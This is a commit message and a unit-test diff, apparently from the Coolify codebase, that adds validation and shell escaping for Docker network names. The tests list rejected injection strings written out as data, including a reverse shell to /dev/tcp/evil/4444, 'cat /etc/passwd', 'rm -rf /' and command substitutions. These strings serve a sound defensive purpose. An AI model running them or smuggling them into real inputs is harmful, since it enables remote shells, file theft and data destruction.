fix: add validation and escaping for Docker network names

Add strict validation for Docker network names using a regex pattern
that matches Docker's naming rules (alphanumeric start, followed by
alphanumeric, dots, hyphens, underscores).

Changes:
- Add DOCKER_NETWORK_PATTERN to ValidationPatterns with helper methods
- Validate network field in Destination creation and update Livewire components
- Add setNetworkAttribute mutator on StandaloneDocker and SwarmDocker models
- Apply escapeshellarg() to all network field usages in shell commands across
  ApplicationDeploymentJob, DatabaseBackupJob, StartService, Init command,
  proxy helpers, and Destination/Show
- Add comprehensive tests for pattern validation and model mutator

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

tests/Unit/ValidationPatternsTest.php

@@ -80,3 +80,53 @@ it('falls back to random name when repo produces empty name', function () {
     expect(mb_strlen($name))->toBeGreaterThanOrEqual(3)
         ->and(preg_match(ValidationPatterns::NAME_PATTERN, $name))->toBe(1);
 });
+
+it('accepts valid Docker network names', function (string $network) {
+    expect(ValidationPatterns::isValidDockerNetwork($network))->toBeTrue();
+})->with([
+    'simple name' => 'mynetwork',
+    'with hyphen' => 'my-network',
+    'with underscore' => 'my_network',
+    'with dot' => 'my.network',
+    'cuid2 format' => 'ck8s2z1x0000001mhg3f9d0g1',
+    'alphanumeric' => 'network123',
+    'starts with number' => '1network',
+    'complex valid' => 'coolify-proxy.net_2',
+]);
+
+it('rejects Docker network names with shell metacharacters', function (string $network) {
+    expect(ValidationPatterns::isValidDockerNetwork($network))->toBeFalse();
+})->with([
+    'semicolon injection' => 'poc; bash -i >& /dev/tcp/evil/4444 0>&1 #',
+    'pipe injection' => 'net|cat /etc/passwd',
+    'dollar injection' => 'net$(whoami)',
+    'backtick injection' => 'net`id`',
+    'ampersand injection' => 'net&rm -rf /',
+    'space' => 'net work',
+    'newline' => "net\nwork",
+    'starts with dot' => '.network',
+    'starts with hyphen' => '-network',
+    'slash' => 'net/work',
+    'backslash' => 'net\\work',
+    'empty string' => '',
+    'single quotes' => "net'work",
+    'double quotes' => 'net"work',
+    'greater than' => 'net>work',
+    'less than' => 'net<work',
+]);
+
+it('generates dockerNetworkRules with correct defaults', function () {
+    $rules = ValidationPatterns::dockerNetworkRules();
+
+    expect($rules)->toContain('required')
+        ->toContain('string')
+        ->toContain('max:255')
+        ->toContain('regex:'.ValidationPatterns::DOCKER_NETWORK_PATTERN);
+});
+
+it('generates nullable dockerNetworkRules when not required', function () {
+    $rules = ValidationPatterns::dockerNetworkRules(required: false);
+
+    expect($rules)->toContain('nullable')
+        ->not->toContain('required');
+});